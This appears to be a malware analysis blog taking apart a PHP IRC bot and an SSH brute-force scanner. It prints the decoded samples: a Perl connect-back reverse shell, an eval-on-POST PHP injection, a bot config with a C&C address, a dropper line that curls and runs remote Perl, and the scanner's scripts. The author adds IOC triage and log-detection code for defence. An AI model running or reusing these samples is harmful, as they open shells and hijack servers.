Irregular Expressions


April 28, 2013  2:59 AM

PHP Bot Decoding – Part 1

Dan O'Connor

The good news is we can handle these samples very easily. The first base64 looks like it will take a bit of work but the second one we can decode right now.

I just happen to have a perl script I wrote to do just the thing.


#!/usr/bin/perl
use strict;
use warnings;
use Compress::Zlib;   # not needed for this sample, but handy when a blob turns out to be gzip'd
use MIME::Base64;

# Paste the base64 blob pulled from the sample here.
my $new = "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";

# Decode and print the result; redirect stdout to a file if it is a binary.
my $test = MIME::Base64::decode($new);
print $test;

It’s not complex, but it does the job well, and you can use > to redirect the output to a file if the base64 turns out to be a binary. In this case we don’t need to worry; it’s another perl script.


#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] \n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "" x 4;
exit(0);
}

I wanted to look up what that pack command was doing so I put it into Google. It brings up a lot of hits with samples from perl courses showing how to make a client-server application. I won’t be following this any more; if you are wondering, pack is used in perl to, well, pack data.
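As an added illustration (not part of the original post) of what that pack template builds: the four items S, n, A4 and x8 lay out a 16-byte sockaddr_in by hand, which is why the script can hand the result straight to connect(). The same layout can be produced and parsed back with Python's struct module; the host 192.0.2.10 is a constructed placeholder.

```python
import socket
import struct
from typing import Tuple

# Perl's pack "SnA4x8", 2, $port, $target builds a sockaddr_in field by field:
#   S  -> unsigned short, native byte order  (sin_family, 2 == AF_INET)
#   n  -> unsigned 16-bit, network/big-endian (sin_port)
#   A4 -> 4 raw bytes                         (sin_addr, from inet_aton)
#   x8 -> 8 null padding bytes                (sin_zero)
# 2 + 2 + 4 + 8 = 16 bytes, the size of struct sockaddr_in.
PERL_TEMPLATE = "SnA4x8"

def pack_sockaddr_in(host: str, port: int) -> bytes:
    """Reproduce pack "SnA4x8", 2, $port, inet_aton($host) with struct."""
    family = struct.pack("=H", socket.AF_INET)    # 'S': native-order unsigned short
    port_be = struct.pack("!H", port)             # 'n': big-endian unsigned short
    addr = socket.inet_aton(host)                 # 'A4': 4 raw address bytes
    return family + port_be + addr + b"\x00" * 8  # 'x8': sin_zero padding

def unpack_sockaddr_in(buf: bytes) -> Tuple[int, int, str]:
    """Recover (family, port, dotted host) from a 16-byte sockaddr_in blob,
    e.g. one pulled out of a memory dump or a decoded script."""
    if len(buf) != 16:
        raise ValueError(f"expected 16 bytes, got {len(buf)}")
    (family,) = struct.unpack("=H", buf[0:2])
    (port,) = struct.unpack("!H", buf[2:4])
    host = socket.inet_ntoa(buf[4:8])
    return family, port, host

if __name__ == "__main__":
    # Constructed sample: the script's default port is 80; the host is a placeholder.
    blob = pack_sockaddr_in("192.0.2.10", 80)
    print(blob.hex())
    print(unpack_sockaddr_in(blob))
```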

I am going to need a couple days to check the rest of this out. Stay tuned.

April 28, 2013  2:43 AM

Looking For Samples?

Dan O'Connor

Practice is always good. There are a few sites I look at when I am looking for things to analyze; one that always seems to have something for me is clean-mx.de. I just pulled what looks like a PHP bot off of one of the database entries. I posted a snippet below.


^JaVa Coder^ shell v2.0 ^Ojo Dumeh^

body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}

<?
$dir = @getcwd();
echo "JaVa Coder 
";
$OS = @PHP_OS;
echo "OSTYPE :$OS 
";
echo "uname -a; $uname 
";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {

One thing I look for in these bots is URLs, IPs and Base64-encoded strings. We have both in this sample: two Base64 blobs;


<?php if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,''))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i

And


$dc_source = "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";

We have what looks to be the IRC C&C.

class pBot
{
var $config = array("server"=>"106.187.97.158",
"port"=>"7000",
"pass"=>"toni",
"prefix"=>"Ddoser",
"maxrand"=>"4",
"chan"=>"#FBI",
"chan2"=>"#CIA",
"key"=>"toni",
"modes"=>"+ps",
"password"=>"toni",
"trigger"=>".",
"hostauth"=>"*" // * for any hostname (remember: /setvhost scanner.crew)

We also have a URL to check out.


<?
$url="http://ircq.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild2.txt;perl mild2.txt;rm -rf mild2.txt*;');
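The triage described in this post (pull out the URLs, IPs and Base64 blobs, decode the Base64, and gunzip it when it starts with the 1f8b magic the sample's own tmp_lkojfghx function checks for) as an added Python example that is not from the original post. The sample text, the addresses and the URL in it are constructed stand-ins for the snippets above, not the real bot's values.

```python
import base64
import binascii
import gzip
import re
import zlib
from typing import Dict, List

# Constructed stand-in for the PHP bot snippets: a pBot-style config line, a
# base64_decode() call whose payload is a gzip'd PHP fragment (so the 1f8b
# branch gets exercised) and the curl-then-perl dropper line. All values made up.
INNER = b"<?php\n$url='http://bot.example/mild2.txt';\n$server='198.51.100.7';\n"
BLOB = base64.b64encode(gzip.compress(INNER)).decode()
SAMPLE = (
    'class pBot { var $config = array("server"=>"203.0.113.9", "port"=>"7000");\n'
    "if(!defined('TMP_X'))define('TMP_X',base64_decode('" + BLOB + "'));\n"
    "exec('cd /tmp;curl -O http://bot.example/mild2.txt;perl mild2.txt');\n"
)

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL_RE = re.compile(r"https?://[\w.-]+(?:/[\w./-]*)?")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long base64 runs only

def decode_blob(b64: str) -> bytes:
    """base64-decode; if the result starts with the gzip magic 1f8b, inflate it."""
    raw = base64.b64decode(b64, validate=True)
    return gzip.decompress(raw) if raw[:2] == b"\x1f\x8b" else raw

def is_text(data: bytes) -> bool:
    """Printable check: show the output, or redirect it to a file if binary."""
    return bool(data) and all(b in b"\t\r\n" or 32 <= b < 127 for b in data)

def triage(sample: str) -> Dict[str, List[str]]:
    """Pull out what is worth looking at in a PHP bot: IPs, URLs, decoded base64."""
    ips = set(IPV4_RE.findall(sample))
    urls = set(URL_RE.findall(sample))
    decoded: List[str] = []
    for blob in B64_RE.findall(sample):
        try:
            data = decode_blob(blob)
        except (binascii.Error, OSError, EOFError, zlib.error, ValueError):
            continue  # not really base64, or a corrupt gzip stream
        decoded.append(data.decode() if is_text(data) else f"<binary, {len(data)} bytes>")
        # Decoded layers usually carry more indicators; scan them as well.
        text = data.decode("latin-1")
        ips |= set(IPV4_RE.findall(text))
        urls |= set(URL_RE.findall(text))
    return {"ips": sorted(ips), "urls": sorted(urls), "decoded": decoded}

if __name__ == "__main__":
    print(triage(SAMPLE))
```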

And it looks like we have another bot to look at in mild2.txt.


#!/usr/bin/perl
#
# What is New in V2.3 ? :
#
# + Improved Scanner
# + Improved Configuration
# + Nmap PortScan
# + LogCleaner
# + Mailer
#
#You can use the following commands :
#!bot @portscan
#!bot @nmap
#!bot @back
#!bot @udpflood
#!bot @tcpflood
#!bot @httpflood
#!bot @linuxhelp
#!bot @hajar
#!bot @system
#!bot @milw0rm
#!bot @logcleaner
#!bot @sendmail
#!bot @join
#!bot @part
#!bot @help
#!bot cd tmp for example
#!bot !eval

It also uses the same IRC server.


$servidor='106.187.97.158' unless $servidor;
my $porta='7000';


April 28, 2013  2:12 AM

SSH Brute Force Scanner – Tools Used

Dan O'Connor

I mentioned a few tools as I was looking at the unixcod scanner, but I thought it would be nice to place them all in one post.

IDA Pro Free;

One thing I did not mention about this is that it is cross platform. Yes, you can run it on Linux and OSX, at least the full version. The only thing to watch out for is that when you start working on a file it will start in graph view. You can change it easily by right clicking on it and selecting text. Graph view is handy but I prefer to spend most of my time in text view.


REMnux;

There is no point re-inventing the wheel. All of the tools I usually need when performing analysis are included with REMnux. Most of the time I use it to emulate and capture the network traffic samples could be making. Using the utilities farpd (fake arp) and fakedns you can have REMnux redirect any traffic being made to itself. It also comes with an IRC server and a pre-made fake web server that uses nc (netcat). Strings, which I mentioned more than once, is also on here; it should be included in most distros and if it is not you should be able to install it. I would just recommend doing all of your sample work away from production machines. It just takes one slip up and you could be in trouble. With REMnux you can have it running as a VM and just revert the state.



April 28, 2013  1:55 AM

SSH Brute Force Scanner – Part 6

Dan O'Connor

Well, after working with the scanner for a couple of hours I cannot seem to entice any other behavior out of it other than collecting a list of IPs and associated logins. Also, after more static analysis of it I cannot see anything that says it will do more than that.

I did do some looking around on the Internet to see what else comes up with ‘unixcod’; there was lots of talk but I found a couple of links that are worth sharing.

First check out this thread about a hacked web server.  Does that not look familiar?


unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache 360 Jun 3 23:47 .
drwxrwxrwt 3 root root 60 Jun 3 00:24 ..
-rwxr-xr-x 1 apache apache 0 May 19 06:02 124.164.find.22
-rwxr-xr-x 1 apache apache 0 Mar 24 22:28 129.135.find.22
-rwxr-xr-x 1 apache apache 0 Mar 24 22:25 129.find.22
-rwxr-xr-x 1 apache apache 0 May 25 13:54 21.168.find.22
-rwxr-xr-x 1 apache apache 12687 May 25 06:16 60.191.find.22
-rw-r--r-- 1 apache apache 0 Jun 3 23:45 83.182.find.22
-rwxr-xr-x 1 apache apache 4631 Apr 21 17:50 84.2.find.22
-rwxr-xr-x 1 apache apache 0 May 25 06:17 89.38.find.22
-rwxr-xr-x 1 apache apache 2362 May 19 15:28 91.204.find.22
-rwxr-xr-x 1 apache apache 216 May 18 2005 auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf
-rwxr-xr-x 1 apache apache 15729 Oct 14 2005 find
-rw-r--r-- 1 apache apache 5262 Jun 3 23:45 log
-rwxr-xr-x 1 apache apache 751 May 25 06:33 unix
-rw-r--r-- 1 apache apache 0 Jun 3 23:04 vuln.txt
-rwxr-xr-x 1 apache apache 671 May 25 13:56 x

The only additional file is ‘x’, which seems to be a copy of ‘unix’ in this case.

The other link is a pastebin dump. It is a long one. Someone has uploaded a chat log of IRC sessions. What appears to be going on is a group is working on locating servers with root and what they mention as just smtp. They are using the compromised servers for spam of financial users. It sure seems like they are phishing, but nothing says it 100%. Also I am unsure of what the smtp is, but I think they are looking for mail servers that they can use for mass mailings. They are also using unixcod for collecting these accounts; there are more than a few dumps of logins posted in that pastebin.


April 27, 2013  12:04 AM

SSH Brute Force Scanner – Part 5

Dan O'Connor

I have been doing some basic things with ‘atack’, one of the first things I do with samples is run ‘strings’ against it. I find this a great way to try and see what the binary is going to do before you start running it in your test environment. I have a few suspicions about it, one of them is I think it may have the ability to do file system operations like copy.

Another excellent tool you can use is IDA Pro Free. If you like IDA Pro Free the good news is you can buy the retail version. The only feature that I think is worth mentioning in the non-free version is that it has the ability to transform your dump into pseudo-code. But other than that the free version will more than suffice for what we are doing.

The first place I go once I have a sample opened is the names window.
[Screenshot: the names window]

The good news is,  my initial feeling that ‘atack’ had the ability to copy files seems to be correct.

[Screenshot: sftp-related entries in the names window]

Now we can check our strings again and see what we have that looks like a file path. There are a few that I think are worth following.


strings atack | egrep "/\S+\/" | less
%s/.ssh/identity
%s/.ssh/id_dsa
%s/.ssh/id_rsa
%s/.ssh/identity.pub
%s/.ssh/id_dsa.pub
%s/.ssh/id_rsa.pub
/etc/resolv.conf
/etc/host.conf
/etc/nsswitch.conf
/etc/localtime
/usr/share/zoneinfo
/etc/mtab
/etc/fstab


April 26, 2013  1:40 AM

SSH Brute Force Scanner – Part 4

Dan O'Connor

I have made some progress with ‘atack’ just attacking my local analysis machine. I still have lots of work to do but I have figured out some more of what it is up to.

Currently I still do not know the purpose of adding the digits when executing, but I am sure I will figure that out once I start static analysis of the file. Changing the number does not seem to do much, but it could be due to my limited environment and data files that I have created for it.

On my analysis machine I have created two users, and in the data file I am using the interface IP address and the local loopback address as a second system entry.


/unixcod$ cat data.conf
test test
test1 test

/unixcod$ cat ip.conf
127.0.0.1
IPAddress

The test user does not have a home directory created, and test1 does. While examining the strings of ‘atack’ there was mention of home directories but I have not been able to see any difference between the two when I am testing.

If the attempts are successful, ‘atack’ responds on the console.

UnixCoD own ->test:test:IPAddress

It will also create a file in the working directory called vuln.txt with a similar list of usernames and addresses.


cat vuln.txt
test:test:IPAddress

Currently it does not attempt to do anything with the compromised accounts, but these are also empty. I am wondering if it will go for any keys sitting in .ssh if they were to exist.


April 24, 2013  9:47 PM

SSH Brute Force Scanner – Part 3

Dan O'Connor

Next it seems like they started counting all of the lines in the ‘ip.conf’ that contained periods ‘.’ and then stored them in ‘$oopsnr2’, but then they do not call it again.


oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"

They even make a reference to it in the comments: “Only $oopsnr2 servers. There is a beginning for. all”.

Now ‘atack’ is launched.

./atack 100
rm -rf $1.find.22 ip.conf

I am not entirely sure of what the significance of ‘100’ is after the command; it will take some further analysis of ‘atack’ to figure that part out.

But since we have the file in my sandbox, I can at least poke at it. It also looks like we are going to have to recreate the ‘ip.conf’ file if we are going to get this to work. I created one with just 127.0.0.1, then we can watch the logs on the local system and see what happens.

Launching ‘./atack 100’ will just return the following:


[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]

Then it continues to operate in the background, trying to log in.

pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=localhost user=root
Failed password for root from 127.0.0.1 port 42106 ssh2
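Those two log lines are what a defender gets to see of the scanner, so here is an added Python example (not part of the original post) that reads the sshd "Failed password" / "Accepted password" lines from an auth log, flags any source that racks up too many failures inside a short window, and records a success that follows the burst, which is the case the scanner reports as "UnixCoD own". The log excerpt is constructed; the threshold and window are assumptions to tune for your environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed auth.log excerpt modelled on the lines the scanner produced above:
# a burst of failures from one source against dictionary accounts, then a success.
SAMPLE_LOG = """\
Apr 24 21:30:01 lab sshd[4101]: Failed password for root from 127.0.0.1 port 42106 ssh2
Apr 24 21:30:02 lab sshd[4102]: Failed password for invalid user admin from 127.0.0.1 port 42107 ssh2
Apr 24 21:30:02 lab sshd[4103]: Failed password for root from 127.0.0.1 port 42108 ssh2
Apr 24 21:30:03 lab sshd[4104]: Failed password for test from 127.0.0.1 port 42109 ssh2
Apr 24 21:30:03 lab sshd[4105]: Failed password for guest from 127.0.0.1 port 42110 ssh2
Apr 24 21:30:04 lab sshd[4106]: Accepted password for test from 127.0.0.1 port 42111 ssh2
Apr 24 21:45:00 lab sshd[4200]: Failed password for alice from 198.51.100.8 port 5022 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+ ssh2$")

def parse(log: str) -> List[Tuple[datetime, str, str, str]]:
    """Return (timestamp, result, user, ip) for every sshd password line."""
    out = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")  # year-less syslog stamp
            out.append((ts, m["result"], m["user"], m["ip"]))
    return out

def detect(log: str, threshold: int = 5, window_s: int = 60) -> Dict[str, dict]:
    """Flag sources with >= threshold failures inside window_s seconds and note any
    account that then logged in successfully from the same source."""
    fails: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    alerts: Dict[str, dict] = {}
    for ts, result, user, ip in parse(log):
        if result == "Failed":
            fails[ip].append((ts, user))
            recent = [(t, u) for t, u in fails[ip] if (ts - t).total_seconds() <= window_s]
            if len(recent) >= threshold:
                alerts[ip] = {"failures": len(recent),
                              "users": sorted({u for _, u in recent}),
                              "compromised": alerts.get(ip, {}).get("compromised", [])}
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["compromised"].append(user)  # success after a brute-force burst
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```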

There is lots going on inside of ‘atack’; part 4 will deal with it.


April 24, 2013  9:13 PM

SSH Brute Force Scanner – Part 2

Dan O'Connor

The ‘data.conf’ file is a list of usernames and passwords to attempt. It contains 24,024 combinations.


root root
admin admin
test test
guest guest
webmaster webmaster

The included file ‘find’ appears to be a network scanner of some sort. I might come back to this but it is not really what I am looking for.

‘test.txt’ seems to be the output from running ‘auto’, but it looks like it was missing some flags. It is a 2.0M file with nothing but the following in it.

./assh 192.168.1.0 ; ./assh 192.168.1.0 ; ./assh 192.168.1.0 ;

‘unix’ appears to be what ties this all together now that we kinda know what each part is about.


#!/bin/bash
if [ $# != 1 ]; then
echo "[+] Folosim : $0 [b class]"
exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #UnixCoD [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22

sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`
echo "[+] Incepe partea cea mai misto :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"
./atack 100
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"

Since they were not nice enough to put English comments in, we have to use Google translate to tell what it says. But I think we can figure it out from here.

The ‘if’ statement at the start is looking to make sure an option was provided on the command line.

if [ $# != 1 ]; then

I am pretty sure it is looking for a network range. The next command executes ‘find’ and provides it with what was given on the command line, ‘$1’, and a port. It’s port 22, no surprise here if they are looking for ssh servers.

./find $1 22

Next it creates a file called ‘ip.conf’ that contains a unique list of all of the hosts that ‘find’ located.

cat $1.find.22 |sort |uniq > ip.conf

Part 3


April 24, 2013  8:54 PM

SSH Brute Force Scanner – Part 1

Dan O'Connor

I was looking around and found an article about an SSH Brute Force Scanner someone had gotten a hold of but they could not get it working.

You can read it here.

When you unpack the tarball this is what you are going to get.


/unixcod# ls
atack auto data.conf find ip.conf test.txt unix

Looking quickly at the files ‘atack’ appears to be what is doing all of the work here. The others are either data files or wrappers to execute ‘atack’.

The file ‘auto’ is just a loop to try a range of addresses against ‘./assh’, which is not included with this bundle. It could be that it is simply a renamed version of ‘atack’, but they don’t use the same options.


#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do
echo -n "./assh $brange.$crange ; " >> $file
let crange=crange+1
done

When auto is run, it will ask for a range; what it is looking for is something like 192.168.0 without the last octet. You can see that is taken care of by the variable ‘$crange’ in the while loop. Every loop through will increase ‘$crange’ until 255. This is a simple script and not really useful if you want to scan more than a class A network.

Part 2


April 24, 2013  8:13 PM

New VirusTotal Functionality

Dan O'Connor

VirusTotal now allows you to send pcap (packet capture) files directly to them.

Here is one of the examples of what you can send that they provided.

VirusTotal is an excellent tool, and this provides a handy place to send your traffic that you have captured from your network or sandbox for quick analysis.

Just a quick word of caution on sending samples, and now pcap files, to sites like VirusTotal. While it is handy to have the searchable analysis, remember that anyone can search those results. If you happen to be part of a targeted attack you could be tipping your hand to the attacker. They can be searching sites like this for IPs and hashes involved in their attack. Once the attacker knows that they have been discovered they could do anything, including damaging systems in an effort to cover up.

